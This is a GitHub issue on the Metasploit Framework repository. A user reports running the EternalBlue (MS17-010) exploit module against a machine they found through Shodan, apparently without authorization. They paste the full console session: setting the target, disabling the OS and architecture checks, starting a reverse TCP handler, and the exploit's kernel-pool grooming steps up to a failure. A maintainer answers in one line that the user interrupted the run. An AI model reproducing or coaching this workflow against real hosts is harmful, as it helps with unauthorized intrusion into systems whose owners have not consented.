search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
34.02k stars 13.94k forks source link

Eternalblue FAIL message what it means ? #9640

Closed xc542 closed 6 years ago

xc542 commented 6 years ago

Hi i wanted exploit some computer what i find on shodan.io then i normally start metasploit and set up payload but eternalblue typed fail message what it means ? I want reason. here is full console log :

LOG

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost xx.xx.xx.xx 
rhost => xx.xx.xx.xx
msf exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               xx.xx.xx.xx      yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

msf exploit(windows/smb/ms17_010_eternalblue) > set VerifyArch false
VerifyArch => false
msf exploit(windows/smb/ms17_010_eternalblue) > set VerifyTarget false
VerifyTarget => false
msf exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.1.43:4444 
[*] xx.xx.xx.xx:445 - Connecting to target for exploitation.
[+] xx.xx.xx.xx:445 - Connection established for exploitation.
[+] xx.xx.xx.xx:445 - Target OS selected valid for OS indicated by SMB reply
[*] xx.xx.xx.xx:445 - CORE raw buffer dump (30 bytes)
[*] xx.xx.xx.xx:445 - 0x00000000  57 69 6e 64 6f 77 73 20 58 50 20 33 37 39 30 20  Windows XP 3790 
[*] xx.xx.xx.xx:445 - 0x00000010  53 65 72 76 69 63 65 20 50 61 63 6b 20 32        Service Pack 2  
[+] xx.xx.xx.xx:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] xx.xx.xx.xx:445 - Trying exploit with 12 Groom Allocations.
[*] xx.xx.xx.xx:445 - Sending all but last fragment of exploit packet
[*] xx.xx.xx.xx:445 - Starting non-paged pool grooming
[+] xx.xx.xx.xx:445 - Sending SMBv2 buffers
[+] xx.xx.xx.xx:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] xx.xx.xx.xx:445 - Sending final SMBv2 buffers.
[*] xx.xx.xx.xx:445 - Sending last fragment of exploit packet!
[*] xx.xx.xx.xx:445 - Receiving response from exploit packet
[+] xx.xx.xx.xx:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] xx.xx.xx.xx:445 - Sending egg to corrupted connection.
[*] xx.xx.xx.xx:445 - Triggering free of corrupted buffer.
[-] xx.xx.xx.xx:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] xx.xx.xx.xx:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] xx.xx.xx.xx:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] xx.xx.xx.xx:445 - Connecting to target for exploitation.
[+] xx.xx.xx.xx:445 - Connection established for exploitation.
[+] xx.xx.xx.xx:445 - Target OS selected valid for OS indicated by SMB reply
[*] xx.xx.xx.xx:445 - CORE raw buffer dump (30 bytes)
[*] xx.xx.xx.xx:445 - 0x00000000  57 69 6e 64 6f 77 73 20 58 50 20 33 37 39 30 20  Windows XP 3790 
[*] xx.xx.xx.xx:445 - 0x00000010  53 65 72 76 69 63 65 20 50 61 63 6b 20 32        Service Pack 2  
[+] xx.xx.xx.xx:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] xx.xx.xx.xx:445 - Trying exploit with 17 Groom Allocations.
[*] xx.xx.xx.xx:445 - Sending all but last fragment of exploit packet
^C[-] xx.xx.xx.xx:445 - Exploit failed: Interrupt 
[*] Exploit completed, but no session was created.

Metasploit version

metasploit v4.16.39-dev

I installed Metasploit with:

OS

VMware

thank you in advance for any anwser

h00die commented 6 years ago

it means you hit ctr+c and stopped it from trying again.